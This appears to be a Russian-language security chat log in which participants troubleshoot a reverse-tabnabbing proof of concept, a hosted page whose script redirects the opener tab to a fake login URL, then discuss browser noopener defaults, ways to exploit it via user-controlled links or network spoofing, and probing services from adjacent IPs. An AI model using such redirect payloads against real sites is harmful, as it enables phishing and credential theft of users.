᠌
токен сразу в хидден поле страницы есть
Значит генерируется сервером, просто подставляй его каждый запрос
Size: a a a
2020 April 02
NM
что я делаю не так?
1 нашел тег
2 поменял:
<a href="http://172.16.226.130" target="_blank">
3 на серваке 172.16.226.130 apache2, где в index.html код:
<html>
<body>
<script>
if (window.opener) {
window.opener.location = "https://vulnerable.com/login;
}
</script>
</body>
</html>
4 на уязвимом сайте открываю этот href, и нихрена не происходит.
1 нашел тег
target="_blank">2 поменял:
<a href="http://172.16.226.130" target="_blank">
3 на серваке 172.16.226.130 apache2, где в index.html код:
<html>
<body>
<script>
if (window.opener) {
window.opener.location = "https://vulnerable.com/login;
}
</script>
</body>
</html>
4 на уязвимом сайте открываю этот href, и нихрена не происходит.
NM
понимаю…
In Safari Technology Preview 68, target="_blank" on anchors implies rel="noopener".
In Safari Technology Preview 68, target="_blank" on anchors implies rel="noopener".
NM
ахренеть вот это вектор
DS
Это не в превью а везде
NM
да уже понял ))
NM
челюсть на полу от того как это работает
NM
в ff нету, удивлен
S
Фф хороший 😬
NM
safari, chrome, opera tabnabbing не пашет, ff кросавец
NM
а в edge робит?
NM
только не понятно как это эксплуатировать можно, прежде чем tabnabbing заработает, надо исходную страницу поправить. Потенциально только где http и в какой нибудь стремной вайфай сети.
᠌
только не понятно как это эксплуатировать можно, прежде чем tabnabbing заработает, надо исходную страницу поправить. Потенциально только где http и в какой нибудь стремной вайфай сети.
Может там возможность редактировать html с блеклистом или юзер input в href
S
только не понятно как это эксплуатировать можно, прежде чем tabnabbing заработает, надо исходную страницу поправить. Потенциально только где http и в какой нибудь стремной вайфай сети.
Спуфить местную сетку хороший вариант
КР
Некоторые сервисы ведут себя странно, если заходить из х.х.х.* , где х совпадает с IP сервиса.
Не знаю как, но на одном популярном сервисе у меня поменялся внешний вид. Я сначала подумал, что обновление какое-то выкатили. Оказалось, что это DEV версия, которая отображается, в зависимости от IP. o_O
Не знаю как, но на одном популярном сервисе у меня поменялся внешний вид. Я сначала подумал, что обновление какое-то выкатили. Оказалось, что это DEV версия, которая отображается, в зависимости от IP. o_O
I
а как ты настолько близко попадаешь к ним в сеть?
КР
а как ты настолько близко попадаешь к ним в сеть?
просто повезло. С 3 попытки получил IP для выделенного сервера. Они не выкупали всю подсеть у датацентра :)
Так "везет" второй раз)))
Если чего накопаю интересного - райтап сделаю :) пока собираю :)
Тут больше интересно неадекватное поведение сервисов.
И очень высокая скорость выполнения запросов.
Так "везет" второй раз)))
Если чего накопаю интересного - райтап сделаю :) пока собираю :)
Тут больше интересно неадекватное поведение сервисов.
И очень высокая скорость выполнения запросов.
👾0
подскажите, как лучше всего чекнуть вирт. хосты? к примеру окунь нашел что они имеются
КР